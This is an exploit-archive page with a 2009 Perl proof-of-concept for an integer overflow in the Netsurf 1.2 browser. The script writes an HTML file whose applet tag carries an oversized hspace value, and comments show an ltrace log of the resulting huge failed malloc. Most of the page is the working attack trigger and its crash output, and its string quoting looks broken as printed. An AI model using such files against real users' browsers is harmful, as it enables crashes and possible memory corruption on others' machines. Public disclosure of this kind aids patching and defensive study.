netsurf_hspace_intof.txt

Posted on 15 January 2009
#!/usr/bin/perl
# netsurf_hspace_intof1.pl
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# [ltrace log -- hspace = 30000, without --sync]
#
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
#                                                         = 0x8cbda01
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)
#                                                         = 0
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)
#                                                         = 0
# cairo_clip(0xb6600948, 0, 0, 0, 0)
#                                                         = 0xb6600aec
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
#                                                         = 0x8cbda01
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
# malloc(3073536192) /// HUGE MALLOC
#                                                         = NULL
# <... gdk_pixbuf_get_from_drawable resumed> )
#                                                         = 0
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
# free(0xb6600dc8)
#                                                         = <void>
# free(0xb6600de0)
#                                                         = <void>
#
# Adv Ref: netsurf_multiple_adv.txt

$filename = $ARGV[0];
if(!defined($filename))
{

print "Usage: $0 <filename.html>
";

}

$head = "<html>" . "
";
$trig = "<applet code="test.class" hspace="32767">" . "
";
#$trig = "<img src="test.jpg" hspace="32767">" . "
";
$foot = "</html>";

$data = $head . $trig . $foot;

open(FILE, '>' . $filename);
print FILE $data;
close(FILE);

exit;
TOP
Malware :

Last 20
Exploits :

Last 20